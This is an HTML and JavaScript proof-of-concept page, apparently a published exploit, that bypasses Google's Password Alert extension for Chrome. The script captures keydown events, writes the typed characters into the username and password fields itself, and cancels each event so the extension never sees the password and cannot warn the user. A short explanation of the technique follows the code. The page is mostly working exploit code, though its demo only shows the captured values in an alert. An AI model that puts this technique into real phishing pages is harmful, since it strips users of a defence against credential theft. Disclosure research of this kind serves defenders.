Google Chrome Password Alert Extension Bypass

1. <html>
2. <head>
3. <title>Google Chrome Password Alert Extension Test</title>
4. <script type="text/javascript">
5.  
6. window.onkeyup = function(e) {
7.     if(e.keyCode>= 32 && e.keyCode<= 126) {
8.         e.preventDefault();
9.     }
10. }
11.  
12. window.onkeydown = function(e) {
13.     var currentChar = null;
14.  
15.     if(e.keyCode>= 32 && e.keyCode<= 126 && !(e.ctrlKey || e.altKey)) {
16.         if(e.keyCode >= 65 && e.keyCode <= 90 && !e.shiftKey) {
17.             currentChar = String.fromCharCode(e.keyCode).toLowerCase();
18.         } else if(e.keyCode >= 48 && e.keyCode <= 57 && e.shiftKey) {
19.             switch(e.keyCode) {
20.                 case 48: currentChar = ")"; break;
21.                 case 49: currentChar = "!"; break;
22.                 case 50: currentChar = "@"; break;
23.                 case 51: currentChar = "#"; break;
24.                 case 52: currentChar = "$"; break;
25.                 case 53: currentChar = "%"; break;
26.                 case 54: currentChar = "^"; break;
27.                 case 55: currentChar = "&"; break;
28.                 case 56: currentChar = "*"; break;
29.                 case 57: currentChar = "("; break;
30.             }  
31.         } else {
32.             currentChar = String.fromCharCode(e.keyCode);
33.         }
34.  
35.         if(currentChar !== null) {
36.             if(e.target.id === "txtUsername" || e.target.id === "txtPassword") {
37.                 document.getElementById(e.target.id).value += currentChar;
38.             }
39.         }
40.  
41.         e.preventDefault();
42.     }
43. }
44.  
45. function DoLogin() {
46.     alert("Username: " + document.getElementById("txtUsername").value
47.         + "\nPassword: " + document.getElementById("txtPassword").value);
48. }
49.  
50. </script>
51. </head>
52. <body>
53.  
54. <form method="post" action="javascript:DoLogin();">
55.     <table>
56.         <tbody>
57.             <tr>
58.                 <td><label for="txtUsername">Username</label></td>
59.                 <td><label for="txtPassword">Password</label></td>
60.             </tr>
61.             <tr>
62.                 <td><input type="text" id="txtUsername" /></td>
63.                 <td><input type="password" id="txtPassword" /></td>
64.             </tr>
65.             <tr>
66.                 <td colspan="2" style="text-align: center;">
67.                     <input type="submit" value="Login" />
68.                     <input type="reset" value="Clear" />
69.                 </td>
70.             </tr>
71.         </tbody>
72.     </table>
73. </form>
74.  
75. <h1>Explanation</h1>
76.  
77. <p>This is a crude proof-of-concept that shows how the Google Password Alert extension for Google Chrome can be bypassed by a malicious website.</p>
78.    
79. <p>This method works by binding the keyup and keydown events for the window, determining which key is being pressed, and appending the value of the key being pressed to the username or password input if one of them has focus.</p>
80.  
81. <p>Once the value has been added to the focused input, the event is canceled with e.preventDefault(). With this method, the event is stopped before the Google Password Alert extension is able to see it; therefore, it cannot warn the user.</p>
82.  
83. </body>
84. </html>